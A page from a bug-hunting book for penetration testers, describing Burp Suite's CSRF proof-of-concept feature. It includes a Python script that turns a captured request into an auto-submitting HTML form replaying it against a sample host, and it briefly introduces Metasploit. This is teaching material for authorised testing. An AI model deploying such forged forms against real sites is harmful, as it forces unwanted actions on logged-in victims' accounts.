Page 199 - Hands-On Bug Hunting for Penetration Testers
Other Tools Chapter 11
After submitting our form, we can see the request has been successfully intercepted by
Burp Proxy:
Now, if you right-click the intercepted request in Burp Proxy, the dropdown menu shows an
Engagement tools submenu. If you're a free/Community user, these options will be
disabled, but if you're a paid/Pro user, you can select Generate CSRF PoC.
You can use this CSRF PoC, which is really just a short HTML snippet that mirrors the form
and submission structure of whatever you're testing, to trigger the application state changes
that prove the presence of a CSRF vulnerability (hence, a proof of concept). If you have access
to this functionality, it's a quick and easy method, but if you don't, it's also easy to replace
(we generated a CSRF PoC programmatically in Chapter , CSRF and Insecure Session
Authentication).
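The following is an added example, not the book's own script or Burp's code: it takes a raw request copied out of Burp Proxy, builds the same kind of auto-submitting HTML form that Generate CSRF PoC produces, and first checks whether the form already carries a parameter that looks like an anti-CSRF token, in which case the PoC would simply be rejected. The request, host name and parameter names below are constructed for the example.

```python
import html
from urllib.parse import parse_qsl

# Field names that usually mean a synchronizer token is already in use.
TOKEN_HINTS = ("csrf", "xsrf", "_token", "authenticity_token", "nonce")

# Constructed sample of a request as copied from Burp Proxy (not a real site).
SAMPLE_REQUEST = (
    "POST /account/email HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "email=new%40example.com&confirm=1"
)

def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params = parse_qsl(body, keep_blank_values=True)  # list of (name, value)
    return method, path, headers, params

def has_csrf_token(params):
    """True if any form field name looks like an anti-CSRF token."""
    return any(hint in name.lower() for name, _ in params for hint in TOKEN_HINTS)

def generate_csrf_poc(method, action, params):
    """Return an auto-submitting HTML form that replays the captured request."""
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (html.escape(n, quote=True), html.escape(v, quote=True))
        for n, v in params
    )
    return (
        "<html><body>\n"
        '  <form id="poc" action="%s" method="%s">\n%s\n  </form>\n'
        "  <script>document.getElementById('poc').submit();</script>\n"
        "</body></html>"
    ) % (html.escape(action, quote=True), method, inputs)

def build_poc_from_raw(raw, scheme="https"):
    """None when the request already carries a token; otherwise the PoC HTML."""
    method, path, headers, params = parse_raw_request(raw)
    if has_csrf_token(params):
        return None
    return generate_csrf_poc(method, f"{scheme}://{headers['host']}{path}", params)

if __name__ == "__main__":
    print(build_poc_from_raw(SAMPLE_REQUEST))
```

Save the returned HTML to a file and open it in the browser session that is logged in to the test application; the state change only goes through if the endpoint lacks a token check.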
Metasploit and Exploitation Frameworks
Metasploit is a popular exploitation framework provided by Rapid7 that, although it
includes a stable of common scanning and proxy features, really shines in the post-
discovery, exploit-writing phase, when the bug has been found and you're trying to use it
as the foothold for a larger attack.